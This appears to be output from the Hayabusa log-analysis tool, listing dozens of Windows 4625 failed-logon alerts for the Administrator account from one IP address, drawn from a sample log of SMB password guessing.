2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QBrGAScjpAdScGmJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n90F99qBpmUUVLId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MLeOkIG0hVHIOnN7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vVx5uUtkaFIf7PWZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kgd7lCQUQ3dHN18S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b8m2MmpFVK9Uojp7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F0NZjeu3lb5xddVQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YjjXBZnyWt0ljzpv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sinFBozyUR0sBadM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Au22Y0LIuvTmZDpy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QDWW3VfZ7rKayV2v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zPgaFDZtc5wEupnq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TpYZc2TTDfJFnPHo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rYKkl1iHImW9NwKv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KxA2dh1iUMaMWOkA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sCzEzW8jDZGGZcpd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p8510u5OsCVd94I5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2a0whHngnv7o1Bz2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xy6cGuYgubjlXoMw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: luoXLN2XZQC0lHfu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8jdKLW96haKCHHXI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9SQSH6E1aKXu1o7T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nOUdKa838wK1mLFw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aFmILxspIJsiEHwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCz7qbdSEyqxQSKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ny3F1xPgakJK0CA7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vi7Moaa6d12CzWhl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fbbRVOig9bn9p5g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qSZrfRe9d0LLkbmA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QqdZMYsbXFlrKFxk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kypdxj88trEUBEny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9hM8fge1IrNsJNd2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SzG27JSj6iAFyiNT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hWcjuW8dU5ATLHzB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ns9lm9Nvhvi4fY6A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aExdYPqY2eUCYZmC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t9cnmRGdByuJlKZj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f9RvWTFFUgCrhlkD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HC3oQUIEWqztyx6s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TK3BOeD2w9xPB4N1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6yzU5WuvpmPKLSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GFoUGsara5Pl03WP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qLaOCImeMIMlGvMj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Vzb3pEI2ZeP2NFA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Fa7ebH7UXd1KW4X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wRBHXRkOa6x5KI5G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VNVxzgOLrZzfP3cB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yCNXajRX2lIgLQuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x0nukf24IoalycOn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xZFZN0KfeHtyDppG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZmxqKyWU5GU1y22P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WuRyvCfgQ4rwG3fu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3prKZt5ymouwNKnK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CWrNNn13EC1FLwLA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SfnBT5OvT5cQXHfS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RLZFPCShXoPvvThS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UsPCJ0UlfH4urYrm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MIQlOetFByLZqPkT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c9IBZ0qTDlHWADZt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lmhkB39gKvvuT89e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4KPoZ8JB7WSjUCHW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0mwiPq4gF1YXkQSl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y5ncgrpwOFo7E8vg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KbkG8ezrAPFC0iKu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GW4WKkHocNadDzrb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: unbtFAiykcfKTbQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oRzF1s9XVoRmoFQ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9TO1c7eYd1IQHVwG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wsn5GM4BqEl6A6pY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pq350wqwVDQlTKu9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uMJWwjG7J2sOiBYd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3YusfxQQygi2x5Cu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6q29uj6ovfwz0riC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cj38VsqGLoQ8jGdf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
